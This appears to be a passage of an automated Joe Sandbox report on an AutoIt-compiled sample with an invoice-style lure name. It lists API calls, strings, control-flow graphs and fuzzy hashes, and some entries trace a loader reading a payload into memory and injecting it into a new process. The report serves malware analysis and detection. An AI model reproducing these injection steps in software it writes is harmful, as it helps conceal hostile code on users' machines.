                                                                                • API String ID: 129472671-1195164674
                                                                                • Opcode ID: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
                                                                                • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                                                • Opcode Fuzzy Hash: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
                                                                                • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                • LoadIconW.USER32(00000063), ref: 00403A76
                                                                                • LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                • RegisterClassExW.USER32(?), ref: 00403B16
                                                                                  • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                  • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                  • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                  • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                  • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                  • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                  • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                                • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: df828dda9fd2e6eed5403f1f1154ef51b8e7a1121e93c144bef9ba3ce8889fed
                                                                                • Instruction ID: c6e86abc02fd9118b8950c0d9f5b344415d976f033f4d79ab58d34e16bf03818
                                                                                • Opcode Fuzzy Hash: df828dda9fd2e6eed5403f1f1154ef51b8e7a1121e93c144bef9ba3ce8889fed
                                                                                • Instruction Fuzzy Hash: DFA2797190D3808FC735CB18C8447AABBF1EF95398F09C99DE5AC97292D335A9048B97

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                                • API String ID: 1825951767-3937808951
                                                                                • Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                                • Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                  • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                  • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                  • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                  • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                  • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                  • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                                • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID: <WL$\TL$%I$SL
                                                                                • API String ID: 1986988660-4199584472
                                                                                • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                                • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2034 e80990-e80a3e call e7e380 2037 e80a45-e80a6b call e818a0 CreateFileW 2034->2037 2040 e80a6d 2037->2040 2041 e80a72-e80a82 2037->2041 2042 e80bbd-e80bc1 2040->2042 2048 e80a89-e80aa3 VirtualAlloc 2041->2048 2049 e80a84 2041->2049 2043 e80c03-e80c06 2042->2043 2044 e80bc3-e80bc7 2042->2044 2050 e80c09-e80c10 2043->2050 2046 e80bc9-e80bcc 2044->2046 2047 e80bd3-e80bd7 2044->2047 2046->2047 2051 e80bd9-e80be3 2047->2051 2052 e80be7-e80beb 2047->2052 2053 e80aaa-e80ac1 ReadFile 2048->2053 2054 e80aa5 2048->2054 2049->2042 2055 e80c12-e80c1d 2050->2055 2056 e80c65-e80c7a 2050->2056 2051->2052 2059 e80bfb 2052->2059 2060 e80bed-e80bf7 2052->2060 2061 e80ac8-e80b08 VirtualAlloc 2053->2061 2062 e80ac3 2053->2062 2054->2042 2063 e80c1f 2055->2063 2064 e80c21-e80c2d 2055->2064 2057 e80c8a-e80c92 2056->2057 2058 e80c7c-e80c87 VirtualFree 2056->2058 2058->2057 2059->2043 2060->2059 2067 e80b0a 2061->2067 2068 e80b0f-e80b2a call e81af0 2061->2068 2062->2042 2063->2056 2065 e80c2f-e80c3f 2064->2065 2066 e80c41-e80c4d 2064->2066 2069 e80c63 2065->2069 2070 e80c5a-e80c60 2066->2070 2071 e80c4f-e80c58 2066->2071 2067->2042 2074 e80b35-e80b3f 2068->2074 2069->2050 2070->2069 2071->2069 2075 e80b41-e80b70 call e81af0 2074->2075 2076 e80b72-e80b86 call e81900 2074->2076 2075->2074 2082 e80b88 2076->2082 2083 e80b8a-e80b8e 2076->2083 2082->2042 2084 e80b9a-e80b9e 2083->2084 2085 e80b90-e80b94 CloseHandle 2083->2085 2086 e80bae-e80bb7 2084->2086 2087 e80ba0-e80bab VirtualFree 2084->2087 2085->2084 2086->2037 2086->2042 2087->2086
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E80A61
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E80C87
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                • Instruction ID: 9fa2cec959811ba63a26813076054d2f73149a16b66ba6851ee740816629a15a
                                                                                • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                • Instruction Fuzzy Hash: 14A12770E00208EBDB54DFA4C895BEEB7B5FF48308F209199E519BB280D7759A45CF94

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2165 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                                • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2518 e80730-e8088e call e7e380 call e80620 CreateFileW 2525 e80890 2518->2525 2526 e80895-e808a5 2518->2526 2527 e80945-e8094a 2525->2527 2529 e808ac-e808c6 VirtualAlloc 2526->2529 2530 e808a7 2526->2530 2531 e808c8 2529->2531 2532 e808ca-e808e1 ReadFile 2529->2532 2530->2527 2531->2527 2533 e808e3 2532->2533 2534 e808e5-e8091f call e80660 call e7f620 2532->2534 2533->2527 2539 e8093b-e80943 ExitProcess 2534->2539 2540 e80921-e80936 call e806b0 2534->2540 2539->2527 2540->2539
                                                                                APIs
                                                                                  • Part of subcall function 00E80620: Sleep.KERNEL32(000001F4), ref: 00E80631
                                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E80884
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: IPA4938ANSLAQ359FUNZJ3
                                                                                • API String ID: 2694422964-3298337019
                                                                                • Opcode ID: a204c728e1cf5e02c6f4b9b5ccf306ebd95bff7c7fe146373a8c3180137cd667
                                                                                • Instruction ID: 5343ce5695c8413148b56545f46e043d6d2f1bb88914a3807e39d786fce825b0
                                                                                • Opcode Fuzzy Hash: a204c728e1cf5e02c6f4b9b5ccf306ebd95bff7c7fe146373a8c3180137cd667
                                                                                • Instruction Fuzzy Hash: EE619230D04248DAEF11DBE4D854BEEBB79AF59304F104199E24CBB2C1D6BA1B49CBA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2542 40407c-404092 2543 404098-4040ad call 407a16 2542->2543 2544 40416f-404173 2542->2544 2547 4040b3-4040d3 call 407bcc 2543->2547 2548 43d3c8-43d3d7 LoadStringW 2543->2548 2551 43d3e2-43d3fa call 407b2e call 406fe3 2547->2551 2553 4040d9-4040dd 2547->2553 2548->2551 2560 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2551->2560 2564 43d400-43d41e call 407cab call 406fe3 call 407cab 2551->2564 2555 4040e3-4040e8 call 407b2e 2553->2555 2556 404174-40417d call 408047 2553->2556 2555->2560 2556->2560 2560->2544 2564->2560
                                                                                APIs
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • _memset.LIBCMT ref: 004040FC
                                                                                • _wcscpy.LIBCMT ref: 00404150
                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                • String ID: Line:
                                                                                • API String ID: 3942752672-1585850449
                                                                                • Opcode ID: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
                                                                                • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                                                • Opcode Fuzzy Hash: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
                                                                                • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                                                APIs
                                                                                  • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                • _free.LIBCMT ref: 0043E263
                                                                                • _free.LIBCMT ref: 0043E2AA
                                                                                  • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                • API String ID: 2861923089-1757145024
                                                                                • Opcode ID: 5ac2f0876360858f4a4f7a23d1b92b3e6bd507ffeb279676637779cb54c060a0
                                                                                • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                                                • Opcode Fuzzy Hash: 5ac2f0876360858f4a4f7a23d1b92b3e6bd507ffeb279676637779cb54c060a0
                                                                                • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                                                • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                                                • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000), ref: 00E7FDDB
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E7FE71
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E7FE93
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                • Instruction ID: 952279bc4d1e82e58fde4c88253ba0358d72af7d6612106747cfe8a4be183c27
                                                                                • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                • Instruction Fuzzy Hash: 49621A30A14258DBEB24DFA4C850BDEB376EF58300F1091A9D10DFB2A0E7769E85CB59
                                                                                APIs
                                                                                  • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                • _free.LIBCMT ref: 004696A2
                                                                                • _free.LIBCMT ref: 004696A9
                                                                                • _free.LIBCMT ref: 00469714
                                                                                  • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                  • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                • _free.LIBCMT ref: 0046971C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                • String ID:
                                                                                • API String ID: 1552873950-0
                                                                                • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                                                • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                • String ID:
                                                                                • API String ID: 2782032738-0
                                                                                • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                                • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                                APIs
                                                                                • SetFilePointerEx.KERNEL32 ref: 00B7B2BA
                                                                                • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00B7B2E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
